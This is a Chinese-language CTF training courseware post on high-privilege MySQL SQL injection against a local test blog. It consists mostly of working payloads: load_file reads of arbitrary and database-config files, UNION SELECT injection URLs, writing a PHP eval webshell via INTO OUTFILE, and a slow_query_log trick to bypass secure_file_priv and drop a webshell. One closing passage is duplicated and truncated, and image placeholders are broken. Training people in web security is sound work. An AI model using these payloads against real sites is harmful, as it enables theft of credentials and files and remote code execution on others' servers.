河南省高校联盟战队课件2(sql-SQL注入&高权限注入)

							河南省高校联盟课件SQL注入&高权限注入

个人介绍

id:故事 普通的web喵

详细视频

SQL注入&高权限注入

MYSQL权限属性:

高权限注入(root):对服务器文件的读写等操作

一、通过数据库进行:
(1)通过数据查看连接用户权限:

select user();

在这里插入图片描述

(2)通过数据库读取:
select load_file('d:/gushi.txt');

在这里插入图片描述

(3)通过数据库写入文件:
select 'xxxx' into outfile 'd/:d.txt';

在这里插入图片描述

二、通过web页面的sql注入漏洞实现操作:
(1)从web浏览器方面展示:读取任意文件
http://127.0.0.7/blog/sql.php?id=-1 UNION SELECT load_file('d:/gushi.txt'),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

在这里插入图片描述

(注意‘/’与‘\’二者)(\n一般为回车换行)用/

http://127.0.0.7/blog/sql.php?id=-1 UNION SELECT load_file('D:/phpStudy/PHPTutorial/WWW/blog/config/conn.php'),3,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

在这里插入图片描述
通过网站的漏洞读取到一些敏感信息如数据库配置文件。

(2)注意点

1.要注意的是要绝对路径

2.路径获取:phpinfo,报错,字典等

https://www.cnblogs.com/milantgh/p/3842306.html
(3)通过漏洞写入文件
http://127.0.0.7/blog/sql.php?id=-1 UNION SELECT "<?php eval($_POST[‘m’]);?>",2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile "c:\ab.php"

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8hULRJ2W-1650435300659)(D:\software\Typora\courseware\河南高校联盟课件\SQL注入课件\image\image-20220418154425810.png)]

http://127.0.0.7/blog/sql.php?id=-1 UNION SELECT "<?php eval($_POST[‘m’]);?>",2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile "D:/phpStudy/PHPTutorial/WWW/blog/ab.php"

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ggVcJolk-1650435300660)(D:\software\Typora\courseware\河南高校联盟课件\SQL注入课件\image\image-20220418160903231.png)]
在这里插入图片描述

三、其他方式进行突破:

无法写入:secure_file_priv突破(利用日志文件进行突破)(一般要支持堆叠注入)

set global slow_query_log=1;

set global slow_query_log_file='sell路径';

select"<?php eval($_POST[a]);?>"or sleep(3);
obal slow_query_log_file='sell路径';

select"<?php eval($_POST[a]);?>"or sleep(3);

###学习交流的可以加Q群:622816049

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kui954

感谢各位的支持o(* ̄3 ̄)o

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值